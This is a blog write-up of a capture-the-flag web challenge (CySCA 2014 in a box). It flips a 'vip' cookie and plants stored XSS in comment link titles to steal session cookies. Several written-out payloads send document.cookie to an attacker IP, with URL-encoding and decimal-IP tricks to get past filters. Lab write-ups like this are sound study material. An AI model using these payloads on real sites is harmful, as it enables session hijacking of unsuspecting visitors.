Saturday, March 12, 2016

CyberSecurity Challenge Australia 2014 In a Box - YAWU - Yet Another Write-up

This challenge can be downloaded from vulnhub.com.

Web Application Pentest Section

80 points - Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

Looking at the web page we notice when the page is first visited that the link to the "Blog" is disabled.  Somehow we need to reenable the link to get the flag.


Below is a python script to quickly pass a GET request on the index.py page.



Notice that among the cookies returned is a vip=0.  With this sort of return you can suppose that a VIP user is going to be a value other than 0.  If I modify it to be a 1 the link to the Blog becomes enabled.  With clicking on the Blog link then the flag appears.




160 points - Gain access to the Blog as a registered user to reveal the hidden flag.

The blog allows you to insert comments.  Checking to see if XSS is possible as a comment is inserted.  At the bottom of the textbox you can see how you can make text bold, italicized, and then to add a link.  Upon testing the addition of a link, inside the link title is where we can place the XSS.
With this understanding we can now include XSS in the page to pull the session cookies of other visitors to the pages.  Tried the following in a link title tag:

[<SCRIPT type="text/javascript">var adr = 'http://172.16.102.1/test.php?cookie=' + escape(document.cookie);</SCRIPT>](Test)

This above script was filtered and not posted as a comment...  Trying a different encoding. (URL encoded)

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172.16.102.1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

This time the comment did post as a link however the IP Address is truncated after the first octet.  Going to further encode the IP Address and change the periods to be URL encoded.

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F172%2E16%2E102%2E1%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

Tried the above and it still caught the IP Address that was encoded.  I need a way to encode the IP address and found the following:


This is interesting. The link in this page appears as the following:

<a id="ctl00_ctl00_WholeBody_ContentPane_ContentArea_Body_encCrazyIp" href="http://2886755841" style="font-weight:bold;">2886755841</a>


Below is a python script that I found to convert an IP address to a decimal encoded number.

#!/usr/bin/python

import socket, struct
print struct.unpack("!I", socket.inet_aton("172.16.102.1"))[0]
Output: 2886755841

With the encoded IP Address I changed the comment to be as follows however I notice that we are truncated to just 50+ characters:

[%3CSCRIPT+type%3D%22text%2Fjavascript%22%3Evar+adr+%3D+%27http%3A%2F%2F2886755841%2Ftest.php%3Fcookie%3D%27+%2B+escape%28document.cookie%29%3B%3C%2FSCRIPT%3E](Test)

So the following does pull the PHPSESSID:

[<script>document.location='http://2886755841/?c='+document.cookie;</script>](Test)

However this redirects the user and does not do it blindly. (The below does not work.)

[<script src='http://2886755841/?c='+document.cookie></script>](Test)






220 points - Retrieve the hidden flag from the database.



260 points - Retrieve the hidden flag by gaining access to the caching control panel.



280 points - Reveal the final flag, which is hidden in the /flag.txt file on the web server.

No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...